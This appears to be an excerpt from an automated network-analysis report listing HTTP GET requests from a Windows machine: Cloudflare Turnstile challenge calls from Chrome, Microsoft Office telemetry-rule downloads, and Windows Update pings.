Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7cae957e10e556&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7cae957e10e556&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/377496615:1729797319:ogjAsRMl1tpa_qoXXy9ZpyxOEyCgxnLQP9t8yxWRQ2E/8d7cae957e10e556/3NXPHSK0Y7qWTCnOHHR9z4lle9M2EwsxrP43E54KFLk-1729801378-1.1.1.1-fV7WEagQ3F1BWhD80g9IFQSDrItgEGii0MvgAEfYiOlPT1jhcPwY0dkb2j0_W16b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7cae957e10e556/1729801381091/5088b09fb68d7929013e558d26e9151ba07e6f6cddf0acb0b360434e05b546e1/sI7JTmcAKDMen4Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H2D+HCngALeUZfR&MD=mAexEuHX HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7cae957e10e556/1729801381093/UOIh-UQBb-h8ajQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7cae957e10e556/1729801381093/UOIh-UQBb-h8ajQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H2D+HCngALeUZfR&MD=mAexEuHX HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/377496615:1729797319:ogjAsRMl1tpa_qoXXy9ZpyxOEyCgxnLQP9t8yxWRQ2E/8d7cae957e10e556/3NXPHSK0Y7qWTCnOHHR9z4lle9M2EwsxrP43E54KFLk-1729801378-1.1.1.1-fV7WEagQ3F1BWhD80g9IFQSDrItgEGii0MvgAEfYiOlPT1jhcPwY0dkb2j0_W16b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
